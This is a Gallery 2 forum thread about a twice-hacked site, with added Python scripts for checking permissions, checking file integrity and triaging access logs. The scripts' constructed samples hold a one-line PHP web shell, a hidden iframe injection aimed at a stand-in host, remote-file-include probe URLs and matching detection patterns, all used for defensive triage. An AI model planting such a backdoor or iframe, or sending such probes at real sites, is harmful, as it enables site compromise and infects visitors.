Site Hacked

stender

Joined: 2008-01-04
Posts: 22
Posted: Mon, 2009-06-29 06:37

I have a site running Gallery 2 and I've just found it's been hacked. An iframe has been placed in the header of my home page and my gallery homepage; also, my gallery is no longer working.
I'm having to re-install (don't ask) but am concerned about how they got in so I can make sure it doesn't happen again. Any ideas?

Unfortunately my site was ranked on page 1 of Google but now is not, and is marked as "this site may harm your computer".

 
nivekiam

Joined: 2002-12-10
Posts: 16501
Posted: Mon, 2009-06-29 12:06

You don't mention anything about what version of Gallery you were using.

You don't mention if you are/were using any other software on the site, WordPress, Drupal, or some custom software, etc.

If running version 2.3 I really doubt they got through via Gallery, but there are security concerns with older versions of Gallery which have been fixed in 2.3. Have you looked at your access logs? Did you find out which files exactly were changed? Are you on a shared server? Who does the web server run as? Are your files marked as writable by the web server user?
____________________________________________
Like Gallery? Like the support? Donate now!!! See G2 live here

 
stender

Joined: 2008-01-04
Posts: 22
Posted: Mon, 2009-06-29 12:35

Unfortunately I have moved to a new host now and only kept my images. However, I am trying to install 2.3 from scratch and have fallen at the first hurdle. I cannot get to the install page and my host isn't very helpful; I just get a 500 Internal Server Error. He said the server doesn't allow chmod 777, only 755. I'm totally lost now and without a gallery.

 
nivekiam

Joined: 2002-12-10
Posts: 16501
Posted: Mon, 2009-06-29 12:54

Find a better host. Doesn't sound like one you'd want to use anyway. You do get what you pay for:
http://gallery.menalto.com/node/88391

 
stender

Joined: 2008-01-04
Posts: 22
Posted: Mon, 2009-06-29 14:20

According to them, Gallery 2 needs re-writing as chmodding to 777 is very insecure; they only allow 755 max. Looks like I'm getting nowhere!

 
nivekiam

Joined: 2002-12-10
Posts: 16501
Posted: Mon, 2009-06-29 15:23

It depends on how your host is set up. If the webserver runs under your user account and can create files and directories under g2data, then 755 is all you need. If the webserver runs as a different user account (nobody, apache, www, etc.) then it needs to be either 775 or 777, depending on how your host is set up, so that the webserver can create files and directories under g2data.

If your host is set up with the second configuration and still won't let you change permissions to allow the webserver to write to g2data, then you should find a different host. No web-based application I've seen will work on their servers; WordPress, Drupal, Gallery, Coppermine, and many, many others all require the webserver to be able to create, delete, and modify files under a particular directory or directories.
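The permission rule nivekiam gives above (755 if the webserver runs as your own account, 775 if it shares your group, 777 only if it is a stranger to the directory), together with the "who does the web server run as?" question from his first reply, as a small script. This is an added example, not code from the thread or from Gallery; the account names (`www-data`) and the uid/gid values in the usage are assumptions for illustration.

```python
import grp
import os
import pwd
import stat

# Added example, not Gallery's own code. Works out which mode a data
# directory (g2data in the thread) needs so that the account the web
# server runs as can create files and subdirectories inside it, given
# who owns the directory and which account the server runs as.


def account_gids(username):
    """uid plus primary and supplementary gids of a local account."""
    pw = pwd.getpwnam(username)
    gids = {pw.pw_gid}
    gids.update(g.gr_gid for g in grp.getgrall() if username in g.gr_mem)
    return pw.pw_uid, gids


def which_class(dir_uid, dir_gid, uid, gids):
    """'owner', 'group' or 'other': the permission triple that applies."""
    if uid == dir_uid:
        return "owner"
    if dir_gid in gids:
        return "group"
    return "other"


def can_create_in(mode, dir_uid, dir_gid, uid, gids):
    """Creating an entry needs both write and search (x) on the directory."""
    if uid == 0:
        return True
    shift = {"owner": 6, "group": 3, "other": 0}[which_class(dir_uid, dir_gid, uid, gids)]
    bits = (mode >> shift) & 0o7
    return (bits & 0o3) == 0o3


def minimal_mode(dir_uid, dir_gid, uid, gids):
    """Least permissive of 755 / 775 / 777 that lets (uid, gids) create files.

    755 is enough when the server runs as the directory owner (suexec or
    suPHP style hosts); 775 when it shares the directory's group; only a
    server that is 'other' to the directory genuinely needs 777.
    """
    return {"owner": 0o755, "group": 0o775, "other": 0o777}[
        which_class(dir_uid, dir_gid, uid, gids)
    ]


def check_data_dir(path, server_user):
    """Inspect a real directory against a real account using the host's
    passwd/group database. The result is what a support ticket should state."""
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    uid, gids = account_gids(server_user)
    return {
        "path": path,
        "mode": oct(mode),
        "owner": pwd.getpwuid(st.st_uid).pw_name,
        "server_runs_as": server_user,
        "server_can_create": can_create_in(mode, st.st_uid, st.st_gid, uid, gids),
        "mode_needed": oct(minimal_mode(st.st_uid, st.st_gid, uid, gids)),
    }


if __name__ == "__main__":
    import sys
    # Usage: python check_g2data.py /path/to/g2data www-data   (names assumed)
    print(check_data_dir(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else "www-data"))
```

To learn the account name to pass in, `ps -o user= -C httpd` (or `-C apache2`) on a shell, or `posix_getpwuid(posix_geteuid())` from a PHP page if the posix extension is enabled. If the host lets you `chgrp` g2data to that group, 770 is tighter than 775 and still satisfies the rule; 777 is only unavoidable when the server account shares neither owner nor group with your files.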

 
stender

Joined: 2008-01-04
Posts: 22
Posted: Wed, 2009-07-01 08:29

Having moved my site to another host (albeit with Gallery still not working), my site has been hacked again. An iframe has been placed on my home page header and something has been done to gallery main. Any ideas how I can find out how they are getting in? It's happened only to one site, but on 2 different hosts.

 
nivekiam

Joined: 2002-12-10
Posts: 16501
Posted: Wed, 2009-07-01 13:26

I don't see anywhere where you've addressed anything I've mentioned.

Did you change passwords?

Are you using FTP instead of SFTP or telnet instead of SSH?

Have you checked to make sure your computer doesn't have a virus?

Did you do a clean install of Gallery?

Check your file integrity: FAQ: How can I make sure that my installation files are all intact?

Are you running other software, WordPress, Drupal, Joomla, etc?

PM me your site URL and I'll take a closer look. Probably have to wait until tonight when I have access to my Linux box at home.
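The "check your file integrity" and "did you do a clean install" items in the checklist above, as an added example that is not code from the thread, from Gallery, or from the integrity checker the FAQ link refers to. It hashes a web root, compares it with a baseline taken right after a clean install, and scans every new or changed file for the kind of injection stender describes (a hidden iframe dropped into page headers) plus the obfuscated-eval pattern typical of a dropped PHP backdoor. The file contents, paths, hostname and pattern list are constructed for the example.

```python
import hashlib
import os
import re

# Added example, not Gallery's code. Baseline-and-diff file integrity check
# for a web root, with a scan of changed files for common injection markers.

INJECTION_PATTERNS = {
    # iframe with a zero width or height: invisible to the visitor
    "hidden_iframe": re.compile(
        rb"<iframe\b[^>]*\b(?:width|height)\s*=\s*['\"]?0\b", re.I),
    # eval() wrapped around a decoder: the usual shape of a dropped PHP shell
    "obfuscated_eval": re.compile(
        rb"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    # escaped script written at runtime, another common header injection
    "script_unescape": re.compile(
        rb"document\.write\s*\(\s*unescape\s*\(", re.I),
}


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def manifest_from_tree(root):
    """{relative path: sha256} for every regular file below a real directory."""
    out = {}
    for dirpath, _subdirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            if not os.path.isfile(full):
                continue
            with open(full, "rb") as fh:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                out[rel] = sha256_hex(fh.read())
    return out


def manifest_from_dict(files):
    """Same shape as manifest_from_tree, for an in-memory {path: bytes} tree."""
    return {path: sha256_hex(data) for path, data in files.items()}


def diff_manifest(baseline, current):
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in baseline
                          if p in current and baseline[p] != current[p]),
    }


def injections_in(data):
    """Names of the injection patterns that match a file body."""
    return [name for name, pat in INJECTION_PATTERNS.items() if pat.search(data)]


def triage(baseline, files):
    """New or changed files since the baseline, each with the markers found.

    A file listed with no markers still needs a look: a defacement can be
    plain HTML that no pattern knows about."""
    delta = diff_manifest(baseline, manifest_from_dict(files))
    return {p: injections_in(files[p]) for p in delta["added"] + delta["changed"]}


# Constructed sample: a clean install, and the same tree after a break-in
# that edits the header include and drops a backdoor into the images dir.
CLEAN = {
    "index.php": b"<?php include 'header.php'; ?>\n<h1>Photos</h1>\n",
    "header.php": b"<html><head><title>My site</title></head><body>\n",
    "gallery/main.php": b"<?php // Gallery entry point (placeholder) ?>\n",
}
HACKED = dict(CLEAN)
HACKED["header.php"] = CLEAN["header.php"].replace(
    b"<body>",
    b"<body><iframe src=\"http://example.invalid/in.php\" width=0 height=0></iframe>")
HACKED["images/.cache.php"] = b"<?php eval(base64_decode($_POST['c'])); ?>"

BASELINE = manifest_from_dict(CLEAN)   # take this right after the clean install

if __name__ == "__main__":
    for path, markers in triage(BASELINE, HACKED).items():
        print(path, markers or "(changed, no known marker)")
```

Take the baseline from the freshly installed tree and keep it off the server, since an attacker who can edit header.php can edit a manifest stored next to it. Run the comparison against the live tree (`manifest_from_tree`) after each incident; the list of added files is usually where the backdoor is, and the list of changed files is where the iframe went.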

 
stender

Joined: 2008-01-04
Posts: 22
Posted: Thu, 2009-07-02 09:41

Hi. Yes, I have changed my password.
I am using Dreamweaver to FTP my files.
I do not have a virus.
I have managed to do a new install, using Fantastico to install.
This morning my site seems unaffected, but I would still like to track how the site was hacked.
I still have to remember how to alter my Carbon theme to get it back as it was.

 
nivekiam

Joined: 2002-12-10
Posts: 16501
Posted: Thu, 2009-07-02 13:10
Quote:
I am using Dreamweaver to FTP my files.

While I know that's convenient, I would look into another method for transferring your files. FTP sends everything in clear text: username, password, etc. So someone listening in the middle can pick it up. For example, you go to a local coffee shop that has free wifi with no password to get onto their network. Now all of your traffic is unencrypted, so anyone can watch all the traffic. Now if someone FTPs something, they have the address, username and password with very little effort. If your host supports SFTP, I'd look into using that, though it would probably mean no more transferring with Dreamweaver. FileZilla is one free client that supports SFTP:
http://filezilla-project.org/

Quote:
This morning my site seems unaffected but I would still like to track how the site was hacked.

Probably only going to be able to do that if you check your access logs.

Quote:
I still have to remember how to alter my carbon theme to get it back as it was.

If you have an old copy of your stuff, check out Beyond Compare by www.scootersoftware.com. They have a trial. You can use that to compare old with new and see what needs to be changed. Sure, you can also use diff or some other tools, but Beyond Compare has such a nice GUI :) I've been using it for a long time.

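nivekiam's point above, and in his first reply, is that the access logs are the only place the intrusion path can still be read from. As an added example that is not part of the thread or of Gallery, here is a triage pass over combined-format access log lines that pulls out the three request shapes that usually mark a break-in like this one: a successful POST to a file that is not an application endpoint (a dropped web shell being driven), requests for PHP files inside directories that should hold only data or images, and a query string carrying a remote URL (remote-file-include probing). The log lines, addresses, endpoint list and directory layout are all constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Added example, not Gallery's code. Flags the access-log requests worth
# reading first after a web break-in. Layout assumptions are marked.

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Files a visitor legitimately POSTs to (assumed site layout).
APP_ENDPOINTS = {"/gallery/main.php", "/index.php"}
# Directories that must never serve executable code (assumed site layout).
DATA_DIRS = ("/images/", "/g2data/", "/gallery/g2data/")


def parse(line):
    """One combined-format line to a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qsl(parts.query, keep_blank_values=True)
    rec["status"] = int(rec["status"])
    return rec


def reasons_for(rec):
    out = []
    if (rec["method"] == "POST" and 200 <= rec["status"] < 400
            and rec["path"] not in APP_ENDPOINTS):
        out.append("post_outside_app")
    if (rec["path"].lower().endswith((".php", ".phtml"))
            and rec["path"].startswith(DATA_DIRS)):
        out.append("php_in_data_dir")
    if any(re.match(r"(?i)(?:https?|ftp)://", v) for _k, v in rec["query"]):
        out.append("remote_url_in_query")
    return out


def triage(lines):
    """Every parsed request that raised at least one reason, in log order."""
    findings = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        why = reasons_for(rec)
        if why:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
                             "path": rec["path"], "status": rec["status"], "reasons": why})
    return findings


def suspects(findings):
    """Source addresses ranked by number of flagged requests."""
    return Counter(f["ip"] for f in findings).most_common()


# Constructed sample: documentation-range addresses, one RFI probe, a scan
# for a backdoor, two commands sent to it, and ordinary visitor traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Jun/2009:03:12:41 +0000] "GET /gallery/main.php?g2_view=core.ShowItem&g2_itemId=42 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [29/Jun/2009:03:12:44 +0000] "GET /gallery/main.php?g2_view=core.ShowItem&g2_itemId=42&x=http://198.51.100.9/c.txt? HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [29/Jun/2009:03:14:50 +0000] "GET /images/.cache.php HTTP/1.1" 404 210 "-" "-"',
    '198.51.100.9 - - [29/Jun/2009:03:15:02 +0000] "POST /images/.cache.php HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.9 - - [29/Jun/2009:03:15:09 +0000] "POST /images/.cache.php HTTP/1.1" 200 33 "-" "-"',
    '192.0.2.20 - - [29/Jun/2009:08:01:15 +0000] "GET /index.php HTTP/1.1" 200 4412 "http://www.google.com/" "Mozilla/5.0"',
    '192.0.2.21 - - [29/Jun/2009:08:02:30 +0000] "GET /gallery/main.php?g2_view=core.UserAdmin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.21 - - [29/Jun/2009:08:02:45 +0000] "POST /gallery/main.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["ip"], f["method"], f["path"], f["status"], ",".join(f["reasons"]))
    print("suspects:", suspects(found))
```

Read the findings in time order: the first flagged request from an address is normally the entry, and everything from that address before it (here the RFI-shaped probe from 203.0.113.7) shows what was tried. The timestamp of the first successful POST to the backdoor is the earliest moment the server should be treated as compromised, which is also the cut-off for any backup you restore from.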

 
stender

Joined: 2008-01-04
Posts: 22
Posted: Fri, 2009-07-03 06:25

Thanks for the help.

 
nivekiam

Joined: 2002-12-10
Posts: 16501
Posted: Mon, 2009-07-13 17:03

And to add to this, since you mentioned Dreamweaver and I just learned that there are trojans out there that dig around in Dreamweaver's and other FTP programs' config files for login credentials:
http://it.slashdot.org/story/09/07/13/142210/RIPFTP?art_pos=2

Best to probably not save your passwords in such programs to start with. Also, don't use FTP. If your host doesn't offer a secure method of file transfer, find a different host.
